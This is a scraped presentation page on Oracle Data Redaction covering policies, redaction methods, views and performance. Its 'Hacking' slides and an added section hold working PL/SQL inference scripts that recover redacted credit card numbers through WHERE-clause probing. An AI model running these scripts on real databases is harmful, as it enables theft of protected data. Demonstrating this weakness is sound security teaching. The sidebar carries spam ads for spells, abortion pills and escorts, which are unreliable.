 
Os melhores recursos novos do Oracle Database 12c para desenvolvedores e DBAs...
Os melhores recursos novos do Oracle Database 12c para desenvolvedores e DBAs...Os melhores recursos novos do Oracle Database 12c para desenvolvedores e DBAs...
Os melhores recursos novos do Oracle Database 12c para desenvolvedores e DBAs...
 
OTN TOUR 2016 - DBA Commands and Concepts That Every Developer Should Know
OTN TOUR 2016 - DBA Commands and Concepts That Every Developer Should KnowOTN TOUR 2016 - DBA Commands and Concepts That Every Developer Should Know
OTN TOUR 2016 - DBA Commands and Concepts That Every Developer Should Know
 
OTN TOUR 2016 - Oracle Database 12c - The Best Oracle Database 12c Tuning Fea...
OTN TOUR 2016 - Oracle Database 12c - The Best Oracle Database 12c Tuning Fea...OTN TOUR 2016 - Oracle Database 12c - The Best Oracle Database 12c Tuning Fea...
OTN TOUR 2016 - Oracle Database 12c - The Best Oracle Database 12c Tuning Fea...
 
OTN TOUR 2016 - Oracle Database 12c - The Best Oracle Database 12c New Featur...
OTN TOUR 2016 - Oracle Database 12c - The Best Oracle Database 12c New Featur...OTN TOUR 2016 - Oracle Database 12c - The Best Oracle Database 12c New Featur...
OTN TOUR 2016 - Oracle Database 12c - The Best Oracle Database 12c New Featur...
 
OOW16 - Oracle Database 12c - The Best Oracle Database 12c New Features for D...
OOW16 - Oracle Database 12c - The Best Oracle Database 12c New Features for D...OOW16 - Oracle Database 12c - The Best Oracle Database 12c New Features for D...
OOW16 - Oracle Database 12c - The Best Oracle Database 12c New Features for D...
 
Oracle Database 12c - The Best Oracle Database 12c Tuning Features for Develo...
Oracle Database 12c - The Best Oracle Database 12c Tuning Features for Develo...Oracle Database 12c - The Best Oracle Database 12c Tuning Features for Develo...
Oracle Database 12c - The Best Oracle Database 12c Tuning Features for Develo...
 
DBA Commands and Concepts That Every Developer Should Know
DBA Commands and Concepts That Every Developer Should KnowDBA Commands and Concepts That Every Developer Should Know
DBA Commands and Concepts That Every Developer Should Know
 
Oracle Database 12c - Novas Características para DBAs e Desenvolvedores
Oracle Database 12c - Novas Características para DBAs e DesenvolvedoresOracle Database 12c - Novas Características para DBAs e Desenvolvedores
Oracle Database 12c - Novas Características para DBAs e Desenvolvedores
 
Oracle Data Redaction - EOUC
Oracle Data Redaction - EOUCOracle Data Redaction - EOUC
Oracle Data Redaction - EOUC
 

Dernier

The title is not connected to what is inside
The title is not connected to what is insideThe title is not connected to what is inside
The title is not connected to what is inside
shinachiaurasa2
 
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
masabamasaba
 
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
masabamasaba
 
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
Health
 

Dernier (20)

SHRMPro HRMS Software Solutions Presentation
SHRMPro HRMS Software Solutions PresentationSHRMPro HRMS Software Solutions Presentation
SHRMPro HRMS Software Solutions Presentation
 
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
 
Generic or specific? Making sensible software design decisions
Generic or specific? Making sensible software design decisionsGeneric or specific? Making sensible software design decisions
Generic or specific? Making sensible software design decisions
 
The Top App Development Trends Shaping the Industry in 2024-25 .pdf
The Top App Development Trends Shaping the Industry in 2024-25 .pdfThe Top App Development Trends Shaping the Industry in 2024-25 .pdf
The Top App Development Trends Shaping the Industry in 2024-25 .pdf
 
%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein
%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein
%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein
 
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
 
The title is not connected to what is inside
The title is not connected to what is insideThe title is not connected to what is inside
The title is not connected to what is inside
 
Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...
Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...
Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...
 
%in kempton park+277-882-255-28 abortion pills for sale in kempton park
%in kempton park+277-882-255-28 abortion pills for sale in kempton park %in kempton park+277-882-255-28 abortion pills for sale in kempton park
%in kempton park+277-882-255-28 abortion pills for sale in kempton park
 
Exploring the Best Video Editing App.pdf

Oracle Data Redaction - UKOUG - TECH14

10. Redaction does not show up in the execution plan

SQL> EXPLAIN PLAN FOR SELECT * FROM EMP;
SQL> SELECT * FROM table(DBMS_XPLAN.DISPLAY(format=>'ALL'));

As SCOTT with the MGR role:

--------------------------------------------------------------------------
| Id  | Operation         | Name | Rows  | Bytes | Cost (%CPU)| Time     |
--------------------------------------------------------------------------
|   0 | SELECT STATEMENT  |      |     3 |    36 |     3   (0)| 00:00:01 |
|   1 |  TABLE ACCESS FULL| EMP  |     3 |    36 |     3   (0)| 00:00:01 |
--------------------------------------------------------------------------

As SCOTT without the MGR role:

--------------------------------------------------------------------------
| Id  | Operation         | Name | Rows  | Bytes | Cost (%CPU)| Time     |
--------------------------------------------------------------------------
|   0 | SELECT STATEMENT  |      |     3 |    36 |     3   (0)| 00:00:01 |
|   1 |  TABLE ACCESS FULL| EMP  |     3 |    36 |     3   (0)| 00:00:01 |
--------------------------------------------------------------------------
11. Not to be confused with Oracle Data Masking

With Oracle Data Masking, the data is rewritten using masking formats and the masked data is stored in new data blocks, so the original values are no longer present in that copy. For this reason, Data Masking is more suitable for non-production environments (test and development copies).

** Oracle Data Masking is available only with Enterprise Edition and is licensed separately as the Oracle Data Masking and Subsetting Pack; it is not part of the Advanced Security option, which is what Data Redaction requires.
12. Below are some other features that already existed to help make the data more secure:

  • Virtual Private Database (VPD) - Allows access control at both row and column level by dynamically adding a predicate to SQL statements issued against the database.
  • Oracle Label Security - Allows you to add user-defined labels to table records, combining them with VPD to allow fine control of who sees what.
  • Database Vault - Data Redaction does not prevent privileged users (such as DBAs) from having access to the data being protected. To solve this, you can make use of Database Vault.
13. Planning an Oracle Data Redaction Policy

  1. Ensure that you have been granted the EXECUTE privilege on the DBMS_REDACT PL/SQL package.
  2. Determine the data type of the table or view column that you want to redact.
  3. Ensure that this column is not used in an Oracle Virtual Private Database (VPD) row filtering condition. That is, it must not be part of the VPD predicate generated by the VPD policy function.
  4. Decide on the type of redaction that you want to perform: full, random, partial, regular expressions, or none.
  5. Decide which users to apply the Data Redaction policy to.
  6. Based on this information, create the Data Redaction policy by using the DBMS_REDACT.ADD_POLICY procedure.
  7. Configure the policy to have additional columns redacted (DBMS_REDACT.ALTER_POLICY with action => DBMS_REDACT.ADD_COLUMN).
14. Conditional Redaction Examples

The column is redacted for a session when the policy expression evaluates to TRUE; the expression is evaluated per session, not per row.

  • User environment
    expression => 'SYS_CONTEXT(''USERENV'',''SESSION_USER'') = ''PSMITH'''
  • Database role
    expression => 'SYS_CONTEXT(''SYS_SESSION_ROLES'',''SUPERVISOR'') = ''FALSE'''
  • Oracle Label Security label dominance
    expression => 'OLS_LABEL_DOMINATES(''hr_ols_pol'',''hs'') = 0'
  • Application Express session state
    expression => 'V(''APP_USER'') != ''mavis@example.com'' or V(''APP_USER'') is null'
16. DBMS_REDACT

  • DBMS_REDACT.ALTER_POLICY - Allows changes to existing policies (including adding, modifying or dropping columns).
  • DBMS_REDACT.DISABLE_POLICY - Disables an existing policy.
  • DBMS_REDACT.DROP_POLICY - Drops an existing policy.
  • DBMS_REDACT.ENABLE_POLICY - Enables an existing policy.
  • DBMS_REDACT.UPDATE_FULL_REDACTION_VALUES - Changes the default return values for full redaction. You must restart the database for the change to take effect.
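The seven planning steps on slide 13, a role-based expression from slide 14 and the DBMS_REDACT calls from slide 16, carried through end to end as an added example (this is not code from the presentation). It assumes a table SCOTT.EMP shaped like the one on slide 34 (EMP_NO, NAME, SALARY) plus an extra VARCHAR2 column PHONE stored as NNN-NNN-NNNN, a database role MGR, and that a DBA grants EXECUTE on DBMS_REDACT to SCOTT; all of those are assumptions.

```sql
-- Step 1 (run as a DBA): whoever creates the policy needs EXECUTE on DBMS_REDACT.
GRANT EXECUTE ON dbms_redact TO scott;

-- Steps 2 and 3 (run as SCOTT): confirm the column data types, then check whether
-- any VPD policy is attached to EMP. If one is, read its policy function and make
-- sure SALARY / PHONE are not part of the predicate it generates.
SELECT column_name, data_type, data_length
  FROM user_tab_columns
 WHERE table_name = 'EMP'
   AND column_name IN ('SALARY', 'PHONE');

SELECT policy_name, pf_owner, package, function, enable
  FROM user_policies
 WHERE object_name = 'EMP';

-- Steps 4 to 7: one policy on EMP. The expression is evaluated per session and the
-- columns are redacted when it is TRUE, i.e. when the MGR role is NOT enabled.
BEGIN
  DBMS_REDACT.ADD_POLICY(
    object_schema => 'SCOTT',
    object_name   => 'EMP',
    policy_name   => 'SCOTT_EMP',
    column_name   => 'SALARY',
    function_type => DBMS_REDACT.FULL,            -- NUMBER column: returns 0
    expression    => 'SYS_CONTEXT(''SYS_SESSION_ROLES'',''MGR'') = ''FALSE''');

  -- Step 7: add a second column with a different redaction type. PARTIAL on a
  -- character column takes: input format (V = value char, F = fixed char),
  -- output format, mask character, first and last V position to mask. The input
  -- format must match the stored shape exactly (assumed NNN-NNN-NNNN here).
  DBMS_REDACT.ALTER_POLICY(
    object_schema       => 'SCOTT',
    object_name         => 'EMP',
    policy_name         => 'SCOTT_EMP',
    action              => DBMS_REDACT.ADD_COLUMN,
    column_name         => 'PHONE',
    function_type       => DBMS_REDACT.PARTIAL,
    function_parameters => 'VVVFVVVFVVVV,VVV-VVV-VVVV,X,1,6');   -- e.g. XXX-XXX-1234
END;
/

-- Verify what was registered (same join as the Policy slide).
SELECT rep.policy_name, rep.enable, rec.column_name, rec.function_type
  FROM redaction_policies rep
  JOIN redaction_columns  rec
    ON rec.object_owner = rep.object_owner
   AND rec.object_name  = rep.object_name
 WHERE rep.object_owner = 'SCOTT'
   AND rep.object_name  = 'EMP';

-- Check: the same statement in the two session states the expression distinguishes.
SET ROLE ALL;                 -- MGR enabled  -> expression FALSE -> real values
SELECT emp_no, salary, phone FROM scott.emp WHERE emp_no = 1;
SET ROLE ALL EXCEPT mgr;      -- MGR disabled -> expression TRUE  -> 0 and XXX-XXX-1234
SELECT emp_no, salary, phone FROM scott.emp WHERE emp_no = 1;
```

Two things worth checking before relying on a role-based expression like this one: SYS_SESSION_ROLES reports roles that are enabled in the session, so a user who has MGR granted can turn redaction off for himself with SET ROLE unless MGR is a password-protected or secure application role; and the SET ROLE check above is the minimum test, because the plan (slide 10) gives you no hint whether redaction is happening.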
18. Redaction Methods

  • Full redaction
  • Partial redaction
  • Regular expressions
  • Random redaction
  • No redaction
19. FULL Data Redaction

  • Character data types: the output is a single space
  • Number data types: the output is zero
  • Date-time data types: the output is set to the first day of January, 2001
20. RANDOM Data Redaction

  • Character data types: redacted as random characters in the same character set and with the same byte length as the column definition
  • Number data types: redacted as random numbers whose length is limited by the length of the actual data
  • Date-time data types: redacted as random dates that are always different from those of the actual data
22. Column data types that can be redacted

NUMBER, BINARY_FLOAT, BINARY_DOUBLE, CHAR, VARCHAR2, NCHAR, NVARCHAR2, DATE, TIMESTAMP, TIMESTAMP WITH TIME ZONE, BLOB, CLOB, and NCLOB
31. Operational Activities - No Redaction

  • Backup and Restore
  • Import and Export
  • Patching and Upgrades
  • Replication
  • Users SYS and SYSTEM automatically have the EXEMPT REDACTION POLICY system privilege
  • Data Redaction is not enforced for users connected AS SYSDBA
32. Data Redaction and Data Pump

ORA-28081: Insufficient privileges - the command references a redacted object

Use the EXEMPT REDACTION POLICY system privilege in these cases. However, use it with caution. Note that the role DATAPUMP_EXP_FULL_DATABASE includes the EXEMPT REDACTION POLICY system privilege.
33. Data Redaction and CTAS

In order to perform a CREATE TABLE AS SELECT operation from a table protected by an active redaction policy, the user must have privileges to see the actual data in the source table.

Because applications may need to perform CREATE TABLE AS SELECT operations that involve redacted source columns, you can grant the application the EXEMPT DDL REDACTION POLICY system privilege.
34. Redacted Columns and GROUP BY SQL Expressions

Redacted columns included in SQL expressions in a GROUP BY clause fail as follows. SALARY is under a RANDOM redaction policy, which is why the same query returns different values on each run:

SQL> select * from emp;

    EMP_NO NAME                                         SALARY
---------- ---------------------------------------- ----------
         1 Daniel                                          702
         2 Juca                                            607
         3 Manuel                                          314

SQL> /

    EMP_NO NAME                                         SALARY
---------- ---------------------------------------- ----------
         1 Daniel                                          900
         2 Juca                                            466
         3 Manuel                                          220

SQL> select (salary*1.10) from emp group by (salary*1.10);
select (salary*1.10) from emp group by (salary*1.10)
        *
ERROR at line 1:
ORA-00979: not a GROUP BY expression
35. Data Redaction and Views

  • Columns from materialized views as well as regular views can be redacted
  • Inline views are redacted outermost first
  • A VPD inline view with the predicate is not affected, as it acts on the actual values
  • Redaction policies defined on a VIEW column override the redaction policy defined on the base table column. Example on the next slide.

SELECT XYZ ... AS SELECT A ... AS SELECT B ... AS SELECT C ...

In the above example, SELECT XYZ is redacted first, then SELECT A, SELECT B and so on.
36. Data Redaction and Views

Consider the following policy on column SALARY of table EMP:

OBJECT    EXPRESSION                                         ENABLE COLUMN        FUNCTION_TYPE
--------- -------------------------------------------------- ------ ------------- ----------------
EMP       SYS_CONTEXT('SYS_SESSION_ROLES','MGR') = 'FALSE'   YES    SALARY        RANDOM REDACTION

A view named EMP_V is created over EMP, and a second policy with function type NONE is defined on the view's SALARY column:

OBJECT    EXPRESSION                                         ENABLE COLUMN        FUNCTION_TYPE
--------- -------------------------------------------------- ------ ------------- ----------------
EMP_V     SYS_CONTEXT('SYS_SESSION_ROLES','MGR') = 'FALSE'   YES    SALARY        NO REDACTION
37. Data Redaction and Views

Selecting from the EMP table (session without the MGR role, so SALARY is random-redacted):

SQL> select * from emp where name='Daniel';

    EMP_NO NAME                        SALARY
---------- ----------------------- ----------
         1 Daniel                         706

Selecting from the view: the view's NONE policy overrides the base table policy, so the real value is returned:

SQL> select * from emp_v where name='Daniel';

    EMP_NO NAME                        SALARY
---------- ----------------------- ----------
         1 Daniel                        1001
38. Overhead

  • It could reach up to 10% performance impact when using complex regular expressions
  • Between 2-3% performance impact using the other redaction methods
39. Hacking

  • Never to be considered as a way to protect data from anyone with SQL access to the database
  • Extremely easy to hack once you have access to SQL
  • It was never designed to protect data from the attack we will demonstrate
40. Hacking - Finding Actual Values by Inference

Let's consider the following Redaction Policy (the regular expression keeps only the last four digits of the card number):

BEGIN
  DBMS_REDACT.ADD_POLICY(
    object_schema => 'DDAMEDA',
    object_name   => 'CUSTOMERS',
    policy_name   => 'CREDIT_CARD_NO',
    expression    => 'SYS_CONTEXT(''USERENV'', ''SESSION_USER'') = ''WATCHER''');

  DBMS_REDACT.ALTER_POLICY(
    object_schema          => 'DDAMEDA',
    object_name            => 'CUSTOMERS',
    policy_name            => 'CREDIT_CARD_NO',
    action                 => DBMS_REDACT.ADD_COLUMN,
    column_name            => '"CREDITCARD_NO"',
    function_type          => DBMS_REDACT.REGEXP,
    regexp_pattern         => '.*(\d\d\d\d)$',
    regexp_replace_string  => '************\1',
    regexp_position        => 1,
    regexp_occurrence      => 1,
    regexp_match_parameter => 'i');
END;
/
41. Hacking - Finding Actual Values by Inference

SQL> SHOW USER
USER is "WATCHER"
SQL> SELECT * FROM customers;

CUSTOMER_ID NAME                 CREDITCARD_NO
----------- -------------------- ----------------
          1 Daniel Da Meda       ************4368
          2 Alex Zaballa         ************5211
          3 Antonio Mateus       ************5005
42. Hacking - Finding Actual Values by Inference

SET TIMING ON
SET SERVEROUTPUT ON
DECLARE
  vcreditcard_no CUSTOMERS.creditcard_no%TYPE;   -- starts NULL; NULL || 'x' is 'x' in Oracle
  vcustomer_name CUSTOMERS.name%TYPE;
BEGIN
  -- The card number is stored as 19 characters: four groups of four digits
  -- separated by '-' at positions 5, 10 and 15.
  FOR a IN 1..19 LOOP
    IF a NOT IN (5, 10, 15) THEN
      -- Try every digit at position a. The WHERE clause is evaluated on the real,
      -- unredacted value, so exactly one digit returns the row.
      FOR b IN 0..9 LOOP
        BEGIN
          SELECT name INTO vcustomer_name
            FROM CUSTOMERS
           WHERE customer_id = 2
             AND SUBSTR(creditcard_no, a, 1) = b;
          vcreditcard_no := vcreditcard_no || b;
        EXCEPTION
          WHEN NO_DATA_FOUND THEN NULL;   -- wrong digit, keep trying
        END;
      END LOOP;
    ELSE
      vcreditcard_no := vcreditcard_no || '-';
    END IF;
  END LOOP;
  DBMS_OUTPUT.PUT_LINE('Credit Card Number for ' || vcustomer_name || ' is: ' || vcreditcard_no);
END;
/
43. Hacking - Finding Actual Values by Inference

vi get_creditcard.sql

[oracle@12c Desktop]$ sqlplus watcher/icanseeyou@pdbdev

SQL*Plus: Release 12.1.0.2.0 Production on Wed Nov 5 11:26:53 2014

Copyright (c) 1982, 2014, Oracle.  All rights reserved.

Connected to:
Oracle Database 12c Enterprise Edition Release 12.1.0.2.0 - 64bit Production
With the Partitioning, Automatic Storage Management, OLAP, Advanced Analytics
and Real Application Testing options

SQL> @get_creditcard.sql
Credit Card Number for Alex Zaballa is: 5102-6342-4881-5211

PL/SQL procedure successfully completed.

Elapsed: 00:00:00.03
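The slide 42 script only works because the attacker already knows the value is 19 characters of digits with dashes at fixed positions. The following added example (ours, not the presenters' code) generalises the same inference attack: it first recovers the length with LENGTH() in the WHERE clause, then binary-searches each character's code with ASCII(SUBSTR(...)) <= mid, so it needs about seven probes per character instead of one per candidate and works for any printable-ASCII value. It assumes the same WATCHER session, the same DDAMEDA.CUSTOMERS table and policy as slides 40 and 41, and values of at most 40 characters; those limits are assumptions.

```sql
SET SERVEROUTPUT ON
DECLARE
  c_target  CONSTANT customers.customer_id%TYPE := 2;  -- row to attack (Alex Zaballa on slide 41)
  c_max_len CONSTANT PLS_INTEGER := 40;                -- assumption: values are at most 40 characters
  v_len     PLS_INTEGER;
  v_cnt     PLS_INTEGER;
  v_lo      PLS_INTEGER;
  v_hi      PLS_INTEGER;
  v_mid     PLS_INTEGER;
  v_value   VARCHAR2(4000);
  v_queries PLS_INTEGER := 0;
BEGIN
  -- Step 1: recover the length. Redaction rewrites only the top-level SELECT list
  -- (slide 8); LENGTH() in the WHERE clause is evaluated on the real value.
  FOR n IN 1 .. c_max_len LOOP
    SELECT COUNT(*) INTO v_cnt
      FROM customers
     WHERE customer_id = c_target
       AND LENGTH(creditcard_no) = n;
    v_queries := v_queries + 1;
    IF v_cnt = 1 THEN
      v_len := n;
      EXIT;
    END IF;
  END LOOP;

  IF v_len IS NULL THEN
    DBMS_OUTPUT.PUT_LINE('No row, NULL value, or value longer than ' || c_max_len);
    RETURN;
  END IF;

  -- Step 2: for each position, binary-search the character code over the printable
  -- ASCII range 32..126. Each probe is an ordinary predicate on the real value, so
  -- this costs about 7 queries per character instead of one per candidate.
  FOR p IN 1 .. v_len LOOP
    v_lo := 32;
    v_hi := 126;
    WHILE v_lo < v_hi LOOP
      v_mid := TRUNC((v_lo + v_hi) / 2);
      SELECT COUNT(*) INTO v_cnt
        FROM customers
       WHERE customer_id = c_target
         AND ASCII(SUBSTR(creditcard_no, p, 1)) <= v_mid;
      v_queries := v_queries + 1;
      IF v_cnt = 1 THEN
        v_hi := v_mid;          -- real code is <= mid
      ELSE
        v_lo := v_mid + 1;      -- real code is > mid
      END IF;
    END LOOP;

    -- Confirm the guess with one equality probe. A character outside 32..126
    -- (non-ASCII data) would otherwise be reported silently as CHR(32) or CHR(126).
    SELECT COUNT(*) INTO v_cnt
      FROM customers
     WHERE customer_id = c_target
       AND SUBSTR(creditcard_no, p, 1) = CHR(v_lo);
    v_queries := v_queries + 1;
    v_value := v_value || CASE WHEN v_cnt = 1 THEN CHR(v_lo) ELSE '?' END;
  END LOOP;

  DBMS_OUTPUT.PUT_LINE('Recovered value for customer ' || c_target || ': ' || v_value
                       || ' (' || v_queries || ' queries)');
END;
/
```

For the 19-character number on slide 43 this is roughly 170 SELECTs, all of them ordinary queries against CUSTOMERS that the redaction layer neither blocks nor flags. That is the practical content of slide 39: redaction changes what a result set looks like, not what a SQL session can learn, and protection against users who can type SQL has to come from the access-control features on slide 12 (VPD, Label Security, Database Vault), not from the policy.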
44. About UKOUG

UKOUG exists to serve the Oracle community in the UK and Ireland. We act as a focal point for sharing knowledge about Oracle applications, technologies, tools and developments and, as an independent, not for profit membership organisation, represent the views of users and partners to Oracle.

© Copyright 2014 UKOUG
Contact: User Group House, 591-593 Kingston Road, Wimbledon, London SW20 8SA
T: +44 (0)20 8545 9670
W: www.ukoug.org

Editor's notes

  1. For me, Oracle should provide security features for free, especially for Enterprise Edition. But it is just my opinion.
  2. The next slide will show that the execution plans do not change between queries which return redacted data and queries that do not return redacted data.
  3. The above slide shows that a policy named SCOTT_EMP exists for a table called EMP. The policy is enabled and it is supposed to redact the SALARY column for sessions that do not have the MGR role.
  4. This slide makes it clear that there is no distinction between the execution plans of the same statement with or without data redaction taking place. The redaction magic must happen right after the top-level operation of the execution plan and before the data is sent to the client.
  5. Here are some examples of conditional artefacts that can be used to drive redaction policies.
  6. Import and Export: Data Redaction policies associated with tables and views are included in the export and import operation. Therefore, the policies are enabled and the data is redacted when users query the objects in the imported database. SYSTEM has the EXP_FULL_DATABASE role, which includes the EXEMPT REDACTION POLICY system privilege. Check with Zaballa about replication and Backup & Recovery tasks involving redacted columns.
  7. Alternatively, you can perform the export with a user that is exempt from the redaction policy, namely a user that doesn't fall under the redaction criteria.
  8. Because applications may need to perform CREATE TABLE AS SELECT operations that involve redacted source columns, you can grant the application the EXEMPT DDL REDACTION POLICY system privilege.
  9. The above example shows a table EMP that has a redaction policy enabled on column SALARY. The redaction method is RANDOM but it could be any other redaction method.
  10. Inline views: SELECT XYZ ... AS SELECT A ... AS SELECT B ... AS SELECT C ... SELECT XYZ is redacted first, followed by AS SELECT A, then AS SELECT B, and so on. AS SELECT C is redacted last.
  11. Data Redaction and Views: here we can see that when we select from the view, redaction does not take place even though the EMP base table has a redaction policy defined on the SALARY column.
  12. According to our tests it could reach up to 10% performance impact when using complex RegEx and between 2-3% performance impact using other redaction methods.
  13. Inference.